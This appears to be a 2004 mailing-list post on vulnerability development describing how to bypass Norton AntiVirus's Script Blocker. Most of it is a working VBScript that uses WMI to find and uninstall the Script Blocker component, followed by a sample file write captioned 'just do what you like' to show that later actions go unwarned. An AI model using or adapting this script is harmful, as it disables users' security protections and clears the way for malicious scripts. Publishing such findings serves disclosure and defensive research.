Vulnerability Development: Norton Anti Virus Script Blocker bypass using script(vb,js,...) II
Norton Anti Virus Script Blocker bypass using script(vb,js,...) II
('binary' encoding is not supported, stored as-is)
what i forgot to say in previous post,...
if you start the script with killing Norton AV it's Script Blocker, then Script Blocker will not warn anymore when script is about to use 'dangerous' objects,...
' get wmi
set wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
' enum soft
for each e in wmi.ExecQuery("Select * from Win32_Product")
on error resume next
' uninstall script blocker part of norton
if instr(e.name,"Script") and instr(e.name,"Block") then
e.UnInstall()
end if
next
' just do what you like
set fso = createobject("scripting.filesystemobject")
fso.createtextfile("c:\byenav.txt").write "=)"
norton will still work, only the script blocker will appear dead in the window,....
Received on Jul 16 2004
|